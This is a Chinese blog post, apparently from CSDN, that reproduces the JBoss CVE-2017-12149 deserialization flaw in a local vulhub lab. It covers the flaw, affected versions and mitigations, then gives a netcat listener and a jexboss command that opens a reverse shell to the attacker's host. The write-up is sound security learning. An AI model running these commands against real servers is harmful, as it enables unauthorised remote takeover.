记一次实验:CVE-2017-12149 jboss反序列化漏洞

最新推荐文章于 2024-05-31 11:30:24 发布
最新推荐文章于 2024-05-31 11:30:24 发布
阅读量354 收藏
点赞数
文章标签: 渗透测试 安全漏洞 docker java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43875708/article/details/104949377
版权

目录

CVE-2017-12149 jboss反序列化漏洞

漏洞简介

影响的版本

漏洞防护建议

漏洞复现

利用dockerfile.yml文件搭建镜像

通过镜像创建容器

查看创建的容器

漏洞复现

查看环境

开启端口监听

使用jexboss工具进行反弹shell

成功反弹shell

CVE-2017-12149 jboss反序列化漏洞

漏洞简介

JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。

2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。

影响的版本

5.x和6.x版本的JBOSSAS

漏洞防护建议

有效解决方案:升级到JBOSS AS7版本临时解决方案:

1、不需要 http-invoker.sar 组件的用户可直接删除此组件;

2、用于对 http invoker 组件进行访问控制。

以上都是前期需要了解的漏洞类型,然后要对漏洞有一定的了解,漏洞利用成功性会比较大,下面是漏洞的复现

漏洞复现

利用dockerfile.yml文件搭建镜像

sudo docker-compose up -d

通过镜像创建容器

sudo docker run -d -p 8080:8080 --name jboss vulhub/jboss:as-6.1.0

查看创建的容器

sudo docker ps

漏洞复现

查看环境

环境搭建成功

开启端口监听

nc -lvp 9999

监听端口9999

使用jexboss工具进行反弹shell

python jexboss.py -u http://192.168.150.131:8080 -A --reverse-host 192.168.150.132:9999 -results jboss.txt

成功反弹shell

成功拿到权限

鱼翅的谷仓
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)复现
薛定谔嘚喵博客
05-11 552
漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
漏洞复现】JBoss(CVE-2017-12149)反序列化漏洞
做自己喜欢的事,并将其发挥到极致!
03-24 516
文章目录声明前言一、漏洞描述二、漏洞原理三、漏洞分析JBoss反序列化漏洞分析四、影响版本五、漏洞利用实战复现六、漏洞修复修复原理方法一方法二方法三 声明 本篇文章仅用于漏洞研究和技术学习,切勿用于未授权下的渗透测试行为,切! 前言 JBoss 存在反序列化漏洞,攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危。 一、漏洞描述 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 在 /invoker/readonly 路径下
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
wutiangui的博客
09-11 342
① ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。所以我们使用 ysoserial 来复现生成序列化数据,并重定向到exp.ser文件。该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
JBoss 5.x/6.x 反序列化漏洞复现
LuckySec
12-02 264
0x01 漏洞简介 该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 影响版本: JBoss 5.x JBoss 6.x 0x02 漏洞环境 使用vulhub漏洞平台,执行下面命令启动漏洞环境: cd /vulhub/jboss/CVE-2017-12149 sudo docker-compose up -d 首次
CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用--自测
weixin_30339969的博客
11-27 457
1.下载jboss http://jbossas.jboss.org/downloads/ 2.安装配置,自己百度 3.修改配置,端口和ip远程可以访问 路径:jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml 4.启动服务 到bin目录下启动run.bat 5.访问ip+端口(8082) ...
漏洞复现】JBoss反序列化漏洞(CVE-2017-12149)
cj_Hydra's Blog
05-18 2122
前言: JBoss 反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。但近期有安全研究者发现JBossAS 6.x也受该漏洞影响,恶意访问者利用该漏洞无需用户验证即可获得服务器的控制权。该漏洞的细节和验证代码已公开,为避免造成损失,建议及时修复升级至JBossAS 7版本 影响版本:
Jboss CVE-2017-12149JBoss 反序列化漏洞利用
baiyongliang
06-13 2429
CVE-2017-12149 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
CVE-2017-12149漏洞利用工具,针对该漏洞快速方便的进行利用。
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具,方便我们进行漏洞利用getshell。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
docker镜像反推Dockerfile
Merlin's Engineering Blog
05-27 343
在项目运维的过程中,偶尔会遇到某个docker image打包时候的Dockerfile版本管理不善无法与image对应的问题,抑或需要分析某个三方docker image的构建过程,这时,就希望能够通过image反推构建时的instruction.想实现这个过程可以使用一些三方工具比如dive,但是需要额外的安装,其实docker本身也有可用的功能,能帮助我们分析image的构建命令.
使用dockerfile快速构建一个带ssh的docker镜像
qq_42693842的博客
05-29 181
镜像启动后没有自动启动ssh。需要手动进入镜像启动。
Docker基础篇之常用命令
qq_43456605的博客
05-27 952
启动docker: 停止docker: 重启docker: 查看docker 的运行状态: 开机启动: 查看docker该要信息: 查看docker 帮助文档 查看docker命令帮助文档: 同一个仓库源可以有多个Tag版本,代表这个仓库源的不同个版本,我们使用Repository:Tag来定义不同的镜像。 它的options选项说明如下: docker search [options]:远程库中查找某个镜像的名称 它的options选项说明如下: docker pull 某个xxx镜像名字:将
docker使用
qq_43907296的博客
05-27 420
能看懂哪个用哪个介绍一:https://cloud.tencent.com/developer/article/2157725 介绍二: docker有两个概念需要知道,一个是镜像,一个是容器。docker pull …是从服务端拉取镜像docker run …是选一个镜像制作成容器并运行起来docker stop 容器名:是停止一个容器的运行docker restart 容器名:是重新运行某个容器docker rm 容器名:是删除一个容器docker ps:查看所有运行中的容器docker ps -a
Docker的数据管理(数据卷+数据卷容器)
misakivv的博客
05-30 873
Dcoker的数据管理(数据卷+数据卷容器)
ubuntu离线安装kubesphere(包括docker、harbor)
最新发布
progrmmmm的博客
05-31 738
这边使用虚拟机下载依赖配置环境以及模拟服务器各个节点,使用两个虚拟机模拟离线不联网环境的服务器,使用一个虚拟机联网下载依赖包,然后传入两个不能联网的虚拟机安装所有环境(我这边偷懒就用两个虚拟机中的一个联网下载安装包。再安装到两个虚拟机内了)。
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149JBOSS应用服务器中的一个远程代码执行漏洞JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值